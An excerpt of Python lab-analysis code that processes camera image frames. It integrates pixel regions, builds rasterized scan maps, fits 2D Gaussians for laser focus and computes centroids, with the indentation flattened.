bgframe=kwargs.get('bg_frame','ave')
xylim=kwargs.get('axis','default')
zscale=kwargs.get('z_scale','default')
submin=kwargs.get('sub_min',False)
dt=kwargs.get('frametime',False)
lvscale=kwargs.get('lv',False)
timescale=kwargs.get('timescale',False)
T_R=kwargs.get('T_R',1.)
bndtype=kwargs.get('boundtype','edge')
norm=kwargs.get('normalize',False)
dark=kwargs.get('dark',False)
powscale=kwargs.get('pow','frame')
# Import modules for array and plotting
import numpy as np
import matplotlib.pyplot as plt
import utility as ut
import os
import lv_analysis as lv
if frames!='all':
frames=np.array(frames)
if bgfile==False:
# Import data and remove cosmics with image_remove_cosmics
x,y,pix,x_max,y_max,N,run=im_sub_dark(filename,'slow',dark=dark)
else:
# Import data and remove cosmics with image_sub
x,y,pix,x_max,y_max,N,run=im_sub(filename,bgfile,bg_scale=scale,bg_shift=shift,bg_frame=bgframe,frames=frames)
if frames=='all':
frames=np.arange(N)+1
scaled=''
if lvscale!=False:
pows=lv.lv_energy(lvscale,T_R=T_R)
if powscale=='ave':
pix=pix/(1000*np.mean(pows))
if powscale=='frame':
for i in range(len(pows)):
pix[i,:,:]=pix[i,:,:]/(1000*pows[i])
scaled=' per mW'
if timescale==True:
times=lv.get_avtime(lvscale)
pix=pix/(times*1E-3)
scaled=' per mW*s'
# Integrate over the bounds
if bndtype=='edge':
[l,r]=np.array(bounds[:2])
[t,b]=np.array(bounds[-2:])
intsize=(bounds[1]-bounds[0])*(bounds[3]-bounds[2])
if bndtype=='center':
[l,r]=np.array([bounds[0]-(bounds[2]/2.),bounds[0]+(bounds[2]/2.)])
[t,b]=np.array([bounds[1]-(bounds[3]/2.),bounds[1]+(bounds[3]/2.)])
intsize=bounds[2]*bounds[3]
lf=np.ceil(l)-l
rf=r-np.floor(r)
tf=np.ceil(t)-t
bf=b-np.floor(b)
integral=[]
for j in frames:
i=j-1
fullpix=np.sum(pix[i,m.ceil(t):m.floor(b),m.ceil(l):m.floor(r)])
sidepixl=lf*np.sum(pix[i,m.ceil(t):m.floor(b),m.floor(l)])
sidepixr=rf*np.sum(pix[i,m.ceil(t):m.floor(b),m.floor(r)])
sidepixt=tf*np.sum(pix[i,m.floor(t),m.ceil(l):m.floor(r)])
sidepixb=bf*np.sum(pix[i,m.floor(b),m.ceil(l):m.floor(r)])
cornerbl=bf*lf*pix[i,m.floor(b),m.floor(l)]
cornertl=tf*lf*pix[i,m.floor(t),m.floor(l)]
cornertr=tf*rf*pix[i,m.floor(t),m.floor(r)]
cornerbr=tf*lf*pix[i,m.floor(b),m.floor(r)]
integral.append(fullpix+sidepixl+sidepixr+sidepixt+sidepixb+cornerbl+cornertl+cornerbr+cornertr)
integral=np.array(integral,dtype=float)
if norm==True:
integral=integral/float(intsize)
# Plot the frames desired
if plt_rect==True:
for frame in frames:
plt.figure('int_area')
plt.clf()
im=plt.imshow(pix[(frame-1),:,:],cmap=colmap,interpolation='nearest')
plt.colorbar(im,orientation='vertical')
plt.title(run+': frame '+repr(frame))
plt.xlabel('x Pixel')
plt.ylabel('y Pixel')
# want to start at beginning of first bound, and end of last bound
plt.axis([x[0]-.5,x[-1]+.5,y[0]-.5,y[-1]+.5])
ut.rect([l,r,t,b])
# put pixel number at far pixel edge, instead of middle
plt.xticks(np.arange(np.shape(pix)[2]),np.arange(np.shape(pix)[2])+1)
plt.yticks(np.arange(np.shape(pix)[1]),np.arange(np.shape(pix)[1])+1)
if xylim!='default':
plt.axis(xylim)
if zscale!='default':
plt.clim(zscale)
plt.show()
if frame<=9:
framestr='00'+str(frame)
if 10<=frame<=99:
framestr='0'+str(frame)
if 100<=frame:
framestr=str(frame)
if savepath!=False:
ut.create_dir(savepath)
plt.savefig(savepath+'/'+str(date)+'_run'+str(filename)+'_'+framestr+'_int_area.png')
# Plot integral
if submin==True:
integral=integral-np.amin(integral)
if lab=='default':
lab=run
if overlay==False:
plt.figure(run+'_int')
if overlay==True:
plt.figure('int')
plt.clf()
ax=plt.gca()
if dt==False:
plt.plot(frames,integral,'-o',label=lab)
plt.axis([0,N+1,0,1.1*np.amax(integral)])
plt.xlabel('Frame')
xdata=frames
if dt!=False:
time=np.arange(dt,(np.shape(integral)[0]+1)*dt,dt)
plt.plot(time,integral,'-o',label=lab)
plt.axis([0,time[-1]+dt,0,1.1*np.amax(integral)])
plt.xlabel('Time (s)')
xdata=time
plt.ylabel('Integrated Counts'+scaled)
plt.title(run+' Integral')
bbox_props = dict(boxstyle='square', fc='.9', ec='k', alpha=1.0)
fig_text='X-bounds: '+repr([l,r])+'\nY-bounds: '+repr([t,b])+'\nTotal Pixels: '+repr(np.size(pix[i,t:b,l:r]))
plt.text(.05,.05,fig_text,fontsize=10,bbox=bbox_props,va='bottom',ha='left',transform=ax.transAxes)
plt.show()
if savepath!=False:
plt.savefig(savepath+'/'+str(date)+'_run'+str(filename)+'_int_plot.png')
if store==True:
return integral
#-----------------------------------------------------------------------------------------
def improf_0(filename,ax,bounds,**kwargs):
lvscale=kwargs.get('lvscale',True)
T_R=kwargs.get('T_R',1.)
plot=kwargs.get('plot',False)
import numpy as np
import matplotlib.pyplot as plt
# Read in the file
x,y,pix,x_max,y_max,N,run=im_sub_dark(filename,speed='slow')
# Scale by energy
if lvscale==True:
for i in range(np.shape(pix)[0]):
pix[i,:,:]=pix[i,:,:]/(1e3*lv.lv_energy(filename,T_R=T_R)[i])
# Integrate in one axis to form profile
if ax=='x':
prof=np.sum(pix[:,bounds[0]-1:bounds[1],:],axis=1)
if ax=='y':
prof=np.sum(pix[:,:,bounds[0]-1:bounds[1]],axis=2)
# plot the profile
if plot==True:
plt.figure('profile')
plt.clf()
for i in range(np.shape(prof)[0]):
plt.plot(prof[i,:],label='frame '+str(i+1))
plt.legend(fontsize=11)
plt.show()
return prof
#-----------------------------------------------------------------------------------------
# Function to integrate each frame in the scan and make a 2d plot
def scan_plot(filename,lvnum,center,width,stepsize,numsteps,**kwargs):
# Define keyword arguments
colmap=kwargs.get('cmap','jet')
frames=kwargs.get('frames','all')
bgfile=kwargs.get('bgfile',False)
plt_rect=kwargs.get('plt_rect',True)
savepath=kwargs.get('savepath',False)
store=kwargs.get('store',True)
overlay=kwargs.get('overlay',False)
lab=kwargs.get('label','default')
scale=kwargs.get('bg_scale',1.)
shift=kwargs.get('bg_shift',[0,0])
bgframe=kwargs.get('bg_frame','ave')
xylim=kwargs.get('axis','default')
zscale=kwargs.get('z_scale','default')
# Import modules for array and plotting
import numpy as np
import matplotlib.pyplot as plt
import utility as ut
import os
import lv_analysis as lv
if bgfile==False:
# Import data and remove cosmics with image_remove_cosmics
x,y,pix,x_max,y_max,N,run=im_sub_dark(filename)
else:
# Import data and remove cosmics with image_sub
if frames!='all':
frames=np.array(frames)-1
x,y,pix,x_max,y_max,N,run=im_sub(filename,bgfile,bg_scale=scale,bg_shift=shift,bg_frame=bgframe,frames=frames)
# Make a box centered at some pixel to integrate
bounds=np.zeros((N,4))
bounds[0,:]=[center[0]-.5*width[0],center[0]+.5*width[0],center[1]-.5*width[1],center[1]+.5*width[1]]
xinc,xdir,ymoved=0,1,0
stepsizepix=np.array(stepsize)/5.
for i in range(N):
if i==0:
continue
if xinc==numsteps[0]-1:
bounds[i,:]=[bounds[i-1,0],bounds[i-1,1],bounds[i-1,2]+stepsizepix[1],bounds[i-1,3]+stepsizepix[1]]
ymoved=1
xdir=xdir*-1
if xinc<numsteps[0]-1:
bounds[i,:]=[bounds[i-1,0]+xdir*stepsizepix[0],bounds[i-1,1]+xdir*stepsizepix[0],bounds[i-1,2],bounds[i-1,3]]
xinc+=1
if ymoved==1:
ymoved,xinc=0,0
# Integrate over the bounds
xbounds=bounds[:,:2]-1
ybounds=bounds[:,-2:]-1
xbounds_i=np.ceil(xbounds)
ybounds_i=np.ceil(ybounds)
xbounds_f=xbounds-np.floor(xbounds)
ybounds_f=ybounds-np.floor(ybounds)
integral=np.zeros ((N,),dtype=float)
for i in range(N):
fullpix=np.sum(pix[i,ybounds_i[i,0]+1:ybounds_i[i,1],xbounds_i[i,0]+1:xbounds_i[i,1]])
sidepixl=(1-xbounds_f[i,0])*np.sum(pix[i,ybounds_i[i,0]+1:ybounds_i[i,1],xbounds_i[i,0]])
sidepixr=xbounds_f[i,1]*np.sum(pix[i,ybounds_i[i,0]+1:ybounds_i[i,1],xbounds_i[i,1]])
sidepixb=(1-ybounds_f[i,0])*np.sum(pix[i,ybounds_i[i,0],xbounds_i[i,0]+1:xbounds_i[i,1]])
sidepixt=ybounds_f[i,1]*np.sum(pix[i,ybounds_i[i,1],xbounds_i[i,0]+1:xbounds_i[i,1]])
cornerbl=(1-xbounds_f[i,0])*(1-ybounds_f[i,0])*pix[i,ybounds_i[i,0],xbounds_i[i,0]]
cornertl=(1-xbounds_f[i,0])*ybounds_f[i,1]*pix[i,ybounds_i[i,1],xbounds_i[i,0]]
cornertr=xbounds_f[i,1]*ybounds_f[i,1]*pix[i,ybounds_i[i,1],xbounds_i[i,1]]
cornerbr=xbounds_f[i,1]*(1-ybounds_f[i,0])*pix[i,ybounds_i[i,0],xbounds_i[i,1]]
integral[i]=fullpix+sidepixl+sidepixr+sidepixt+sidepixb+cornerbl+cornertl+cornerbr+cornertr
# Power scale
integral=integral/lv.get_pow(lvnum)
# Plot the frames desired
for frame in range(1,N+1):
plt.figure('int_area_scan')
plt.clf()
im=plt.imshow(pix[(frame-1),:,:],cmap=colmap,interpolation='nearest')
plt.colorbar(im,orientation='vertical')
plt.title(run+': frame '+repr(frame))
plt.xlabel('x Pixel')
plt.ylabel('y Pixel')
# want to start at beginning of first bound, and end of last bound
plt.axis([x[0]-.5,x[-1]+.5,y[0]-.5,y[-1]+.5])
ut.rect(bounds[frame-1,:])
# put pixel number at far pixel edge, instead of middle
plt.xticks(np.arange(np.shape(pix)[2])+.5,np.arange(np.shape(pix)[2]))
plt.yticks(np.arange(np.shape(pix)[1])+.5,np.arange(np.shape(pix)[1]))
if xylim!='default':
plt.axis(xylim)
plt.clim(0,1.05*np.amax(pix))
if zscale!='default':
plt.clim(zscale)
plt.show()
if frame<=9:
framestr='00'+str(frame)
if 10<=frame<=99:
framestr='0'+str(frame)
if 100<=frame:
framestr=str(frame)
if savepath!=False:
ut.create_dir(savepath)
plt.savefig(savepath+'/'+run+'_'+framestr+'_int_area.png')
# Create integral map in 2d
integral2d=integral.reshape(np.flipud(numsteps))
# Flip every other row since scan is rasterized
for i in range(numsteps[1]):
if i%2==1:
integral2d[i,:]=np.flipud(integral2d[i,:])
# Plot integral map
if lab=='default':
lab=run
if overlay==False:
plt.figure(run+'_int2d')
if overlay==True:
plt.figure('int2d')
plt.clf()
im=plt.imshow(integral2d,cmap=colmap,interpolation='nearest',extent=[0,numsteps[0]*stepsize[0],0,numsteps[1]*stepsize[1]])
plt.colorbar(im,orientation='vertical')
plt.title(run+'Integral Scan')
plt.xlabel('x location (micron)')
plt.ylabel('y location (micron)')
if zscale!='default':
plt.clim(zscale)
plt.show()
if savepath!=False:
plt.savefig(savepath+'/'+run+'_intscan.png')
if store==True:
return integral2d,bounds
#------------------------------------------------------------------------------------------
# Function to integrate each frame in the scan and make a 2d plot
def scanplot_static(filename,bounds,numsteps,**kwargs):
# Define keyword arguments
colmap=kwargs.get('cmap','jet')
plt_rect=kwargs.get('plt_rect',True)
savepath=kwargs.get('savepath',False)
store=kwargs.get('store',True)
xylim=kwargs.get('axis','default')
zscale=kwargs.get('z_scale','default')
manrun=kwargs.get('run','expXXX_YYY')
lvnum=kwargs.get('lv','none')
T_R=kwargs.get('T_R',1.)
drop=kwargs.get('drop',[])
sap=kwargs.get('sapphire',False)
dark=kwargs.get('dark',False)
# Import modules for array and plotting
import numpy as np
import matplotlib.pyplot as plt
import utility as ut
import os
import gen_reader as gr
from lmfit import minimize,Parameters,Parameter,Model
import lv_analysis as lv
if sap==True:
savepath=savepath[:-1]
savepath+='_sapphire/'
ut.create_dir(savepath)
# Import data and remove cosmics with image_remove_cosmics
if isinstance(filename,int)==True:
x,y,pix,x_max,y_max,N,run=im_sub_dark(filename,'slow',dark=dark)
# If already imported, just use array
if isinstance(filename,np.ndarray)==True:
pix=filename
N=np.shape(pix)[0]
run=manrun
# Integrate the data in the bounds and plot the data and box
integral=[]
for i in range(N):
integral.append(ut.integrate(pix[i,:,:],bounds,boundtype='edge'))
if i+1 in drop:
integral.pop(-1)
if plt_rect==True and savepath!=False:
plt.figure('int_area')
plt.clf()
im=plt.imshow(pix[i,:,:],cmap=colmap,interpolation='nearest')
plt.colorbar(im,orientation='vertical')
plt.title(run+': frame '+repr(i+1))
plt.xlabel('x Pixel')
plt.ylabel('y Pixel')
if xylim!='default':
plt.axis(xylim)
ut.rect(bounds)
if xylim!='default':
plt.axis(xylim)
plt.show()
if savepath!=False:
if (i+1)<=9:
framestr='00'+str(i+1)
if 10<=(i+1)<=99:
framestr='0'+str(i+1)
if 100<=(i+1) :
framestr=str(i+1)
plt.savefig(savepath+'/'+str(date)+'_run'+str(filename)+'_'+framestr+'_int_area.png')
for i in drop:
integral=np.append(integral,50)
if lvnum!='none':
pows=lv.lv_pow(lvnum,T_R=T_R)
for i in drop:
pows=np.insert(pows,i,pows[i])
integral=integral/(np.absolute(pows)*1E3)
if len(drop)!=0:
intmin,intminf=np.amin(integral[:-len(drop)]),np.argmin(integral[:-len(drop)])+1
if len(drop)==0:
intmin,intminf=np.amin(integral),np.argmin(integral)+1
print(drop)
print(intmin,intminf)
# Create integral map in 2d
integral2d=integral.reshape(np.flipud(numsteps))
# Flip every other row since scan is rasterized
for i in range(numsteps[1]):
if i%2==1:
integral2d[i,:]=np.flipud(integral2d[i,:])
# Plot integral map
plt.figure('int2d')
plt.clf()
im=plt.imshow(integral2d,cmap=colmap,interpolation='nearest',origin='lower')
cb=plt.colorbar(im,orientation='vertical')
cb.formatter.set_powerlimits((0, 0))
cb.update_ticks()
plt.title(run+' Integral Scan')
plt.xlabel('x step')
plt.ylabel('y step')
ut.textbox('Minimum: '+str(int(intmin))+', frame: '+str(intminf),[.05,.95])
if zscale!='default':
plt.clim(zscale)
plt.show()
if savepath!=False:
plt.savefig(savepath+'/'+str(date)+'_run'+str(filename)+'_intscan_static.png')
if store==True:
return integral2d
#------------------------------------------------------------------------------------------
# Function to integrate each frame in the scan and make a 2d plot
def scanplot_fixed(filename,startpos,stepsize,numsteps,**kwargs):
# Define keyword arguments
colmap=kwargs.get('cmap','jet')
plt_rect=kwargs.get('plt_rect',True)
savepath=kwargs.get('savepath',False)
store=kwargs.get('store',True)
xylim=kwargs.get('axis','default')
zscale=kwargs.get('z_scale','default')
intsize=kwargs.get('intsize',[5,5])
manrun=kwargs.get('run','expXXX_YYY')
lvnum=kwargs.get('lv','none')
T_R=kwargs.get('T_R',1.)
drop=kwargs.get('drop',[])
sap=kwargs.get('sapphire',False)
dark=kwargs.get('dark',False)
pixscale=kwargs.get('pixscale','default')
cs=kwargs.get('checkstart',False)
# Import modules for array and plotting
import numpy as np
import matplotlib.pyplot as plt
import utility as ut
import os
import gen_reader as gr
from lmfit import minimize,Parameters,Parameter,Model
import lv_analysis as lv
if sap==True:
savepath=savepath[:-1]
savepath+='_sapphire/'
ut.create_dir(savepath)
ut.create_dir(savepath+'framedata')
# Import data and remove cosmics with image_remove_cosmics
if isinstance(filename,int)==True:
x,y,pix,x_max,y_max,N,run=im_sub_dark(filename,'slow',dark=dark)
# If already imported, just use array
if isinstance(filename,np.ndarray)==True:
pix=filename
N=np.shape(pix)[0]
run=manrun
# Make a box centered at some pixel to integrate
bounds=np.zeros((N,4))
bounds[0,:]=[startpos[0]-.5*intsize[0],startpos[0]+.5*intsize[0],startpos[1]-.5*intsize[1],startpos[1]+.5*intsize[1]]
if sap==True:
bounds[0,2:]=bounds[0,2:]-12
xinc,xdir,ymoved=0,1,0
stepsizepix=np.array(stepsize)/5.
for i in range(N):
if i==0:
continue
if i+1 in drop:
bounds[i,:]=bounds[i-1,:]
continue
if xinc==numsteps[0]-1:
bounds[i,:]=[bounds[i-1,0],bounds[i-1,1],bounds[i-1,2]+stepsizepix[1],bounds[i-1,3]+stepsizepix[1]]
ymoved=1
xdir=xdir*-1
if xinc<numsteps[0]-1:
bounds[i,:]=[bounds[i-1,0]+xdir*stepsizepix[0],bounds[i-1,1]+xdir*stepsizepix[0],bounds[i-1,2],bounds[i-1,3]]
xinc+=1
if ymoved==1:
ymoved,xinc=0,0
# Integrate the data in the bounds and plot the data and box
integral=[]
for i in range(N):
integral.append(ut.integrate(pix[i,:,:],bounds[i,:],boundtype='edge'))
if i+1 in drop:
integral.pop(-1)
if plt_rect==True and savepath!=False:
plt.figure('int_area')
plt.clf()
im=plt.imshow(pix[i,:,:],cmap=colmap,interpolation='nearest')
plt.colorbar(im,orientation='vertical')
plt.title(run+': frame '+repr(i+1))
plt.xlabel('x Pixel')
plt.ylabel('y Pixel')
if xylim!='default':
plt.axis(xylim)
ut.rect(bounds[i,:])
if pixscale!='default':
plt.clim(pixscale)
plt.show()
if savepath!=False:
if (i+1)<=9:
framestr='00'+str(i+1)
if 10<=(i+1)<=99:
framestr='0'+str(i+1)
if 100<=(i+1) :
framestr=str(i+1)
plt.savefig(savepath+'/'+str(date)+'_run'+str(filename)+'_'+framestr+'_int_area.png')
ut.save(np.ravel(pix[i,xylim[2]:xylim[3],xylim[0]:xylim[1]]),['data'],savepath+'framedata/'+str(date)+'_run'+str(filename)+'_'+framestr+'.txt')
if cs==True:
plt.figure('start')
plt.clf()
plt.imshow(pix[0,:,:],cmap=colmap,interpolation='nearest')
ut.rect(bounds[0,:])
if xylim!='default':
plt.axis(xylim)
plt.show()
integral=np.array(integral)
for i in drop:
integral=np.append(integral,50)
if lvnum!='none':
pows=lv.lv_energy(lvnum,T_R=T_R)
for i in drop:
pows=np.insert(pows,i,pows[i])
integral=integral/(np.absolute(pows)*1E3)
if len(drop)!=0:
intmin,intminf=np.amin(integral[:-len(drop)]),np.argmin(integral[:-len(drop)])+1
if len(drop)==0:
intmin,intminf=np.amin(integral),np.argmin(integral)+1
print(drop)
print(intmin,intminf)
# Create integral map in 2d
integral2d=integral.reshape(np.flipud(numsteps))
# Flip every other row since scan is rasterized
for i in range(numsteps[1]):
if i%2==1:
integral2d[i,:]=np.flipud(integral2d[i,:])
# Plot integral map
plt.figure('int2d')
plt.clf()
im=plt.imshow(integral2d,cmap=colmap,interpolation='nearest',origin='lower')
cb=plt.colorbar(im,orientation='vertical')
cb.formatter.set_powerlimits((0, 0))
cb.update_ticks()
plt.title(run+' Integral Scan '+str(intsize[0])+'x'+str(intsize[1]))
plt.xlabel('x step')
plt.ylabel('y step')
#ut.textbox('Minimum: '+str(int(intmin))+', frame: '+str(intminf),[.05,.95])
if zscale!='default':
plt.clim(zscale)
plt.show()
if savepath!=False:
plt.savefig(savepath+'/'+str(date)+'_run'+str(filename)+'_intscan_'+str(intsize[0])+'x'+str(intsize[1])+'.png')
ut.save(np.array([startpos[0],startpos[1],stepsize[0],stepsize[1],intmin,intminf]),['xstart','ystart','xstep','ystep','minimum','min frame'],savepath+'/'+str(date)+'_run'+str(run)+'_scandata.txt')
if store==True:
return integral2d,bounds,integral
#------------------------------------------------------------------------------------------
# Function to integrate each frame in the scan and make a 2d plot
def scanplot_fit(filename,fitbnds,stepsize,numsteps,**kwargs):
# Define keyword arguments
colmap=kwargs.get('cmap','jet')
plt_rect=kwargs.get('plt_rect',True)
savepath=kwargs.get('savepath','/home/chris/anaconda/plots/'+str(date))
store=kwargs.get('store',True)
xylim=kwargs.get('axis','default')
zscale=kwargs.get('z_scale','default')
intsize=kwargs.get('intsize',3.)
# Import modules for array and plotting
import numpy as np
import matplotlib.pyplot as plt
import utility as ut
import os
from lmfit import minimize,Parameters,Parameter,Model
# Import data and remove cosmics with image_remove_cosmics
x,y,pix,x_max,y_max,N,run=im_sub_dark(filename,'slow')
# Slice data for just fit bounds
pixslice=pix[:,fitbnds[2]:fitbnds[3],fitbnds[0]:fitbnds[1]]
x,y=np.arange(fitbnds[0],fitbnds[1]),np.arange(fitbnds[2],fitbnds[3])
# Define 2d gaussian
def gauss2d_flat(x,y,amp,xcenter,ycenter,xwidth,ywidth): # This ends up as f(y,x)
my,mx=np.meshgrid(x,y)
xwidth,ywidth=xwidth/2.,ywidth/2.
return np.ravel(amp*np.exp(-2*(np.square(mx-ycenter)/(np.square(ywidth))))*np.exp(-2*(np.square(my-xcenter))/(np.square(xwidth))))
# Find the peak and integrate region around it
integral,param_all,cov=[],[],[]
p0=[100,np.mean([fitbnds[0],fitbnds[1]]),np.mean([fitbnds[2],fitbnds[3]]),4,4]
p_0s=['amp','xcenter','ycenter','xwidth','ywidth']
func_model=Model(gauss2d_flat,independent_vars=['x','y'],param_names=p_0s)
for i in range(N):
result=func_model.fit(np.ravel(pixsclice[i,:,:]),x=x,y=y,amp=p0[0],xcenter=p0[1],ycenter=p0[2],xwidth=p0[3],ywidth=p0[4],verbose=False)
center=[result.best_values['xcenter'],result.best_values['ycenter']]
param_all.append(center)
integral.append(ut.integrate(data,[center[0]-fitbnds[0],center[1]-fitbnds[2],intsize,intsize]))
if plt_rect==True:
plt.figure('int_area')
plt.clf()
im=plt.imshow(data,cmap=colmap,interpolation='nearest')
plt.colorbar(im,orientation='vertical')
plt.title(run+': frame '+repr(i+1))
plt.xlabel('x Pixel')
plt.ylabel('y Pixel')
ut.rect([center[0]-intsize/2.,center[0]+intsize/2.,center[1]-intsize/2.,center[1]+intsize/2.])
if xylim!='default':
plt.axis(xylim)
if zscale!='default':
plt.clim(zscale)
plt.show()
if (i+1)<=9:
framestr='00'+str(i+1)
if 10<=(i+1)<=99:
framestr='0'+str(i+1)
if 100<=(i+1) :
framestr=str(i+1)
plt.savefig(savepath+'/'+str(date)+'_run'+str(filename)+'_'+framestr+'_int_area.png')
param_all=np.array(param_all)
cov=np.array(cov)
integral=np.array(integral)
# Create integral map in 2d
integral2d=integral.reshape(np.flipud(numsteps))
# Flip every other row since scan is rasterized
for i in range(numsteps[1]):
if i%2==1:
integral2d[i,:]=np.flipud(integral2d[i,:])
# Plot integral map
plt.figure('int2d')
plt.clf()
im=plt.imshow(integral2d,cmap=colmap,interpolation='nearest')
plt.colorbar(im,orientation='vertical')
plt.title(run+'Integral Scan')
plt.xlabel('x step ('+str(stepsize)+' micron)')
plt.ylabel('y step ('+str(stepsize)+' micron)')
if zscale!='default':
plt.clim(zscale)
plt.show()
plt.savefig(savepath+'/'+str(date)+'_run'+str(filename)+'_intscan.png')
# Plot center positions
plt.figure('center_pos')
plt.clf()
plt.plot(param_all[:,0],param_all[:,1],'b-o')
plt.title(run+'Center Fit Positions')
plt.xlabel('x position (pixel)')
plt.ylabel('y position (pixel)')
plt.show()
plt.savefig(savepath+'/'+str(date)+'_run'+str(filename)+'_centerpos.png')
if store==True:
return integral2d,param_all,integral
#------------------------------------------------------------------------------------------
# Function to plot 1st order images
def image_plot_1(filename,**kwargs):
# Define keyword arguments
colmap=kwargs.get('cmap','jet')
dc=kwargs.get('disp_cosmics',False)
frames=kwargs.get('frames','all')
df=kwargs.get('diff_frames',False)
sub=kwargs.get('bgfile',False)
# Import modules for array and plotting
import numpy as np
import matplotlib.pyplot as plt
import utility as u
if bgfile==False:
# Import data and remove cosmics with image_remove_cosmics
wavelength,y,pix,wave_max,y_max,N,run=im_remove_cosmics(filename,'image',dc)
else:
# Import data and remove cosmics with image_sub
wavelength,y,pix,wave_max,y_max,N,run=im_sub(filename,bgfile,dc)
# Calculate the aspect ratio based on the size and number of pixels
extent=[wavelength[0],wavelength[-1],1,y_max]
# Calculate the length/pixel in wavelength and y directions
dx=(wavelength[-1]-wavelength[0])/float(wave_max)
dy=(y[-1]-y[0])/float(y_max)
aspect_ratio=dx/dy
if frames=='all':
frames=range(1,N+1)
# Plot the frames desired
if df==True:
for frame in frames:
fig_new=plt.figure(aspect_ratio,1)
im=plt.imshow(pix[(frame-1),:,:],extent=extent,aspect=aspect_ratio,cmap=colmap,interpolation='nearest')
plt.colorbar(im,orientation='vertical')
plt.title(run+': frame '+repr(frame))
plt.xlabel('Wavelength (nm)')
plt.ylabel('y Pixel')
plt.axis([wavelength[0],wavelength[-1],y[0],y[-1]])
plt.show()
if df==False:
fig=plt.figure(3/aspect_ratio,3)
for frame in frames:
im=plt.imshow(pix[(frame-1),:,:],extent=extent,aspect=aspect_ratio,cmap=colmap,interpolation='nearest',label='Frame '+repr(frame))
plt.colorbar(im,orientation='vertical')
plt.title(run)
plt.xlabel('Wavelength (nm)')
plt.ylabel('y Pixel')
plt.axis([wavelength[0],wavelength[-1],y[0],y[-1]])
plt.legend()
plt.show()
#-----------------------------------------------------------------------------------------
# Function to plot integrated 1st order images (turn them into spectra)
def image_int_1(filename,bounds,**kwargs):
# Define keyword arguments (define frames later)
dc=kwargs.get('disp_cosmics',False)
frames=kwargs.get('frames','all')
df=kwargs.get('diff_frames',False)
sub=kwargs.get('bgfile',False)
# Import modules for array and plotting
import numpy as np
import matplotlib.pyplot as plt
import utility as u
if bgfile==False:
# Import data and remove cosmics with image_remove_cosmics
wavelength,y,pix,wave_max,y_max,N,run=image_remove_cosmics(filename,'image',dc)
else:
# Import data, remove cosmics, and background subtract with image_sub
wavelength,y,pix,wave_max,y_max,N,run=image_sub(filename,bgfile,disp_cosmics=dc)
# Integrate over bounds
pix_int=np.sum(pix[:,bounds[0]:bounds[1],:],1)
if frames=='all':
frames=range(1,N+1)
# Plot the frames desired
if df==True:
for frame in frames:
fig_new=plt.figure()
plt.plot(wavelength,pix_int[(frame-1),:])
plt.title(run+': frame '+repr(frame)+' ROI: '+repr(bounds))
plt.xlabel('Wavelength (nm)')
plt.ylabel('Counts in ROI')
plt.axis([wavelength[0],wavelength[-1],0,1.25*np.amax(pix_int[(frame-1),:])])
plt.show()
if df==False:
fig=plt.figure()
max_counts=[]
for frame in frames:
plt.plot(wavelength,pix_int[(frame-1),:],label='Frame '+repr(frame))
max_counts.append(np.amax(pix_int[(frame-1),:]))
plt.title(run+' ROI: '+repr(bounds))
plt.xlabel('Wavelength (nm)')
plt.ylabel('Counts in ROI')
plt.axis([wavelength[0],wavelength[-1],0,1.25*np.amax(np.array(max_counts))])
plt.legend()
plt.show()
#-----------------------------------------------------------------------------------------
# Function to get laser profile from images (zinfo=[start,step])
def focus_find(filelist,bounds,zinfo,**kwargs):
savepath=kwargs.get('savepath',False)
fig=kwargs.get('fig','')
speed=kwargs.get('speed','slow')
store=kwargs.get('store',False)
# Import modules
import numpy as np
import matplotlib.pyplot as plt
import math
from scipy.optimize import curve_fit
import os
import utility as ut
if savepath!=False:
ut.create_dir(savepath)
# Get data from files
allpix=[]
for filename in filelist:
x,y,pix,x_max,y_max,N,run=im_sub_dark(filename,speed=speed)
allpix.append(pix)
allpix=np.array(allpix)[:,0,bounds[2]:bounds[3],bounds[0]:bounds[1]]
x,y=x[bounds[0]:bounds[1]],y[bounds[2]:bounds[3]]
# Do a 2D gauss fit to each file
widths=np.zeros((2,np.shape(allpix)[0]))
for i in range(np.shape(allpix)[0]):
params=ut.gaussfit2d(allpix[i,:,:],x,y,[100,np.median(x),np.median(y),4,4])
widths[:,i]=[params['xwidth'],params['ywidth']]
# Plot width vs micrometer setting
z=np.arange(zinfo[0],zinfo[0]+len(filelist)*zinfo[1],zinfo[1])
plt.figure('beam_profs')
plt.clf()
plt.plot(z,5*widths[0,:],'bo',label='x profile')
plt.plot(z,5*widths[1,:],'ro',label='y profile')
plt.xlabel('micrometer position (mm)')
plt.ylabel('width (micron)')
plt.legend()
plt.title(str(date)+' Laser Focus Finding')
if savepath!=False:
plt.savefig(savepath+str(date)+'_focus_finder.png')
if store==True:
return z,widths
#------------------------------------------------------------------------------------------
# Function to integrate area in 0-order image
def centroid(filename,bounds,**kwargs):
# Define keyword arguments
colmap=kwargs.get('cmap','jet')
frames=kwargs.get('frames','all')
bgfile=kwargs.get('bgfile',False)
plt_rect=kwargs.get('plt_rect',True)
savepath=kwargs.get('savepath',False)
overlay=kwargs.get('overlay',False)
scale=kwargs.get('bg_scale',1.)
shift=kwargs.get('bg_shift',[0,0])
bgframe=kwargs.get('bg_frame','ave')
xylim=kwargs.get('axis','default')
zscale=kwargs.get('z_scale','default')
stats=kwargs.get('stats',False)
annotate=kwargs.get('annotate',False)
# Import modules for array and plotting
import numpy as np
import matplotlib.pyplot as plt
import utility as ut
import os
if savepath!=False:
ut.create_dir(savepath)
if bgfile==False:
# Import data and remove cosmics with image_remove_cosmics
x,y,pix,x_max,y_max,N,run=im_sub_dark(filename,speed='slow')
# Import data and remove cosmics with image_sub
else:
if frames!='all':
frames=np.array(frames)-1
x,y,pix,x_max,y_max,N,run=im_sub(filename,bgfile,bg_scale=scale,bg_shift=shift,bg_frame=bgframe,frames=frames)
if frames=='all':
frames=range(1,N+1)
frames=np.array(frames)
# Find the Centroid
bounds=np.array(bounds)-1
cent=[]
for i in frames-1:
centx,centy=[],[]
for j in range(bounds[2],bounds[3]+1):
for k in range(bounds[0],bounds[1]+1):
centx.append(pix[i,j,k]*(k+1))
centy.append(pix[i,j,k]*(j+1))
cent.append(((1./np.sum(pix[i,bounds[2]:bounds[3]+1,bounds[0]:bounds[1]+1]))*np.sum(centx),(1./np.sum(pix[i,bounds[2]:bounds[3]+1,bounds[0]:bounds[1]+1]))*np.sum(centy)))
cent=np.array(cent)
# Plot the frames desired
if plt_rect==True:
j=0
for frame in frames:
plt.figure('cent_area')
plt.clf()
im=plt.imshow(pix[(frame-1),:,:],cmap=colmap,interpolation='nearest')
plt.plot(cent[j,0],cent[j,1],'ko',markersize=5)
plt.colorbar(im,orientation='vertical')
plt.title(run+': frame '+repr(frame))
plt.xlabel('x Pixel')
